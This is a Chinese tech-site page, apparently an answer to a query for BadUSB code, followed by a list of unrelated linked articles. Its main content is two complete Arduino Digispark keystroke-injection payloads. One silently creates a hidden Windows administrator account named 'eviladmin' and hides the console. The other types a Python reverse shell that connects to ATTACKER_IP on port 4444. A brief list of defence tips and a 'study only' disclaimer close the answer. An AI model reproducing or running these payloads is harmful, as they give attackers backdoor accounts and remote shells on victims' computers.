登录/注册

badusb 代码

更多

BadUSB 是一种利用 USB 设备的固件漏洞,伪装成键盘输入恶意指令的攻击方式。以下是两个典型场景的示例代码(请仅用于学习研究,禁止非法使用):

场景1:Windows 系统提权后门 (Arduino Digispark)

#include <DigiKeyboard.h>

void setup() {
  DigiKeyboard.sendKeyStroke(0); // 初始化
  DigiKeyboard.delay(500);

  // 打开cmd(管理员权限)
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R
  DigiKeyboard.delay(300);
  DigiKeyboard.print("cmd /k mode con: cols=15 lines=1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_ALT_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(800);

  // 添加隐藏管理员账户
  DigiKeyboard.print("net user eviladmin MyP@ssw0rd! /add /y");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(300);
  DigiKeyboard.print("net localgroup administrators eviladmin /add");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(300);

  // 隐藏执行痕迹
  DigiKeyboard.print("exit");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() {} // 仅执行一次

攻击效果

  1. 静默创建管理员账户 eviladmin,密码 MyP@ssw0rd!
  2. 窗口伪装成单行模式减少注意
  3. 自动关闭CMD窗口

场景2:Linux 反向 Shell (Python + Bash)

#include <DigiKeyboard.h>

void setup() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(1000);

  // 打开终端 (Ubuntu/Debian)
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("python3 -c 'import socket,subprocess,os;");
  DigiKeyboard.print("s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);");
  DigiKeyboard.print("s.connect((\"ATTACKER_IP\",4444));");
  DigiKeyboard.print("os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);");
  DigiKeyboard.print("subprocess.call([\"/bin/sh\",\"-i\"])'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() {}

替换参数

防御建议(针对受害者):

  1. 禁用自动运行:组策略中关闭USB自动执行
  2. 设备白名单:使用USB管理软件限制未知设备
  3. 物理防护:重要设备禁用USB接口或用Kensington锁
  4. 权限控制:日常使用非管理员账户

⚠️ 重要提醒:上述代码演示攻击原理,实际使用违反法律。安全研究需在授权环境下进行。

g代码和m代码表示什么功能

G代码和M代码是数控机床程序中常用的两种指令代码,用于控制数控机床的工作动作和运动方式。 G

2024-02-14 15:49:00

静态代码块、构造代码块、构造函数及普通代码块的执行顺序

在Java中,静态代码块、构造代码块、构造函数、普通代码块的执行顺序是一个笔试的考点,通过这篇文章希望大家能彻底了解它们之间的执行顺序。 1、静

2023-10-09 15:40:56

Klocwork——支持DevOps和功能安全/信息安全的静态代码分析器

1970-01-01 08:00:00 至 1970-01-01 08:00:00

课堂演示源代码汇总下载

课堂演示源代码汇总下载

资料下载 ah此生不换 2021-08-09 10:07:24

机器学习必学的Python代码示例集

机器学习必学的Python代码示例集

资料下载 鸭子定律_ 2021-06-21 09:35:46

DSP载波移相控制C语言源代码下载

DSP载波移相控制C语言源代码下载

资料下载 口沫横 2021-05-12 09:19:18

matlab应用程序及源代码下载

matlab应用程序及源代码下载

资料下载 jf_19650038 2021-04-06 09:10:14

结合动态行为和机器学习的恶意代码检测方法

目前恶意代码出现频繁且抗识别性加强,现有基于签名的恶意代码检测方法无法识别未知与隐藏的恶意代码。提出一种结合动态行为和机器学习的恶意

资料下载 佚名 2021-03-23 16:24:19

实现TCP的C代码封装(含代码

实现TCP的C代码封装(含代码)

2022-09-28 16:03:07

VectorCAST—嵌入式代码自动化测试工具

1970-01-01 08:00:00 至 1970-01-01 08:00:00

Helix QAC 企业级代码静态测试工具

1970-01-01 08:00:00 至 1970-01-01 08:00:00

微软最新写代码神器代码之旅

【导语】:CodeTour(代码之旅)是微软官方开发的 VS Code 扩展,允许记录和回放代码的演练和思路。 简介 CodeTour 是一个 VS Code 插件,允许记录和回放

2021-10-26 10:00:55

USB-HID真的有用吗

0 引言从2014年BADUSB出现以后,USB-HID攻击就这一直被关注,且具争议。争议的焦点是USB-HID的实战效果过于“鸡肋”,无论从早期的BADUSB,还是到后来的各种USB-HID设备

2021-07-28 07:22:34

TPYBoard实例之利用WHID为隔离主机建立隐秘通道 精选资料分享

引言  从2014年BADUSB出现以后,USB-HID攻击就这一直被关注,且具争议。争议的焦点是USB-HID的实战效果过于“鸡肋”,无论从早期的BADUSB,还是到后来的各种USB-HID设备,对于目标机来说,都

2021-07-28 06:51:28

TouchGFX代码框架以及如何添加用户代码

1. 摘要 本文档主要介绍,TouchGFX代码框架以及如何添加用户代码。 2. 准备工作 可以正常运行的TouchGFX工程 3. 代码结构

2021-01-18 11:28:58

更多

7天热门专题 换一换
相关标签